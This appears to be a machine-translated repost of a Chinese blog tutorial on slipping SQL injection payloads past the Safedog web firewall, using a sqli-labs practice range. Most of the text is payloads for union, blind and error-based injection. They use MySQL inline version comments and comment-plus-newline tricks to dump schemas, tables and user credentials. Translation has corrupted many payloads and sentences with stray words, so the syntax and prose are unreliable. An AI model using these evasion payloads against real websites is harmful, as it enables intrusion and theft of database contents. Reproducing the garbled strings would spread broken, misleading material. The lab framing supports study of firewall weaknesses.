Shulou(Shulou.com)05/31 Report--

This article will explain in detail the example analysis of Sql injection into bypass for you. The editor thinks it is very practical, so I share it for you as a reference. I hope you can get something after reading this article.

How does waf defend itself

Waf distinguishes between normal and malicious requests by using a set of rules. For example: security dog, cloud lock, D shield and so on.

Bypass: since there is a rule match, you can find a way to bypass the rule match. For example, common blacklist restrictions, blacklist models use presets

1. Build a sql injection bypass environment

Win7

Phpstdy (mysql:5.7.0 php:5.3.29)

Website apache Security Dog (4.0.28330.0)

Sqlilabs shooting range

Bypass

Adjust the protection level to the highest level:

And 1x1 bypass

First, try 'and 1' and'or 1'

Will be intercepted by the firewall. Try replacing the and and or keywords: replace them with & &, | |

It was still intercepted by the dog. Then you have to find a way to start with 1x1s, either replace 1x1s, or try inline comments. First of all, use and or or

Change from 1 to 1 to a negative number-1 to 1

You can see the successful bypass, indicating that the safety dog did not detect negative numbers.

Then try inline comments:

/ *% "! * / and/*%"! * / 1mm 1muri +-- intercept / *%!% 22pm and + 1MB +-do not intercept

Order by bypasses:

Just use inline comments

/ *%!% 22AccordAccordActionorderUniverse%% 22Universe bylines 3murmurs +-- do not intercept order%23%0Aby 3Mercure +-- do not intercept. When you find the% 23 comment, you won't check it again, so use single-line comments and newline breaks to bypass.

The general security dog will not intercept if you add some useless data to the order by query.

Union select bypass

Inline injection:

Union / *! 10440select*/ 1, 2, 2, 3

Of course, you can also use the middle version number of fuzz: 0440-10449 11440-11449 12440-12449 13440-13449 14400-14499 15440-15449 16440-16449 17440-17449 18440-18449 19440-19449.

Note: MySQL database is specially added to maintain compatibility with other databases. To avoid that SQL statements exported from MySQL cannot be used by other databases, it puts some MySQL-specific statements in /!... /, which will not be executed when used in incompatible databases. However, MySQL itself can recognize and execute. / 50001 / indicates that the intermediate statement is executed when the database version > = 5.00.01.

The second method: comment bypass

Union% 23%0aall select-- union comments + line wrap all select (make multiple queries)

Injection of function

The method adopted is inline comments:

Union / *! 10440select*/ 1 3union hex (user/**/ ()), 3union / *! 10440select*/ 1 Magi hex (database/**/ ()), 3union / *! 10440select*/ 1 Magi hex (@ @ version/**/ ()), 3union / *! 10440select*/ 1 datadir (@ @ datadir), 3

Another way:

? / * & id=-1'union select 1 ·user (), 3-- + * /

Here is the-- + comment character to form the following / into a complete sql statement.

There is no detection for information_schema, so just make sure that the previous union and select bypass.

1:

? id=-1'union / *! 10440select*/ 1 min groupkeeper concat (schema_name), 3 from information_schema.schemata--+

2:

? / * & id=-1'union select 1 from information_schema.schemata--+*/ from information_schema.schemata--+*/ concat (schema_name)

? / * & id=-1'union select 1 column_name grouping concat (column_name), 3 from information_schema.columns where table_name='users' and table_schema='security'--+*/?/*&id=-1'union select 1 retro username sparing password from users where id='3'--+*/

Then through these two methods, you can get the table, column life and field contents of the database.

Blind injection

1. Time blind note:

Usage: inline comments

? / * & id=1' and if (ascii (substr (database (), 1pr 1)) = 115 id=1%27%20and%20if (substr (database/**/ (), 1Pol 1)) = 115 id=1' and if (database (/ *! * /)) = 115 id=1' and if (/ *! * /) 1)-- + * /? id=1' / *! 10440and*/ if (ascii (substr (database/**/ (), 1Magne1)) = 115 Lindsay / (4), 1)-- +

Usage: add in front of if! ~-

? id=1' and! if (ascii (substr (database/**/ (), 1pr 1)) = 115 id=1' and ~ if (ascii (substr (database/**/ (), 1pr 1)) = 115 pencils / (3), 1)-+? id=1' and-if (ascii (substr (database/**/ (), 1Pol 1)) = 115 pencils / (3), 1)-+

Bool blind injection

Blind note method: inline comment

? id=1' / *! 10440and*/length (database/**/ ()) = 8 and left (database/**/ (), 1) = select%20ifnull (cast (username%20as%20char) = 101--+?/*&id=1%27%20and%20ord (select%20ifnull (cast (username%20as%20char)) 0x20)% 20From% 20security.users% 20order% 23% 0Aby% 20id% 20century% 200Magi 1), 1Jue 1)) = 68muri +

Error injection

To bypass the updatexml () and extractvalue () functions, which are commonly used in error injection

Use method: comment + line break.

? / * & id=1%27%20and%20extractvalue%23%0A (1 10440select*/database/**/ concat (0x7e, (/ *! 10440select*/version ()), 0x7e))-+? id=1%27%20and%20extractvalue%23%0A (1 heroin concat (0x7e, (/ *! 10440select*/version ()), 0x7e))-- +

Burst meter:

? / * & id=1%27%20and%20extractvalue%23%0A (1 select%20group_concat concat (0x7e, (select%20group_concat (table_name) from%23%0ainformation_schema.tables%23%0awhere%20table_schema=%27security%27), 0x7e))-- + * /? id=1%27%20and%20extractvalue%23%0A (1 heroin concat (0x7e, (select%20group_concat (table_name) from%23%0ainformation_schema.tables%23%0awhere%20table_schema=0x7365637572697479), 0x7e))-- +

It's the same as the one above the list. Then the contents of the burst field can not be directly select username from users limit 1, but after the from to write a comment line break.

? id=1%27%20and%20extractvalue%23%0A (1 concat (0x7e, (select%20username%20from%23%0ausers%20limit%201), 0x7e))-- +

This is the end of this article on "sample Analysis of Sql injection into bypass". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, please share it out for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.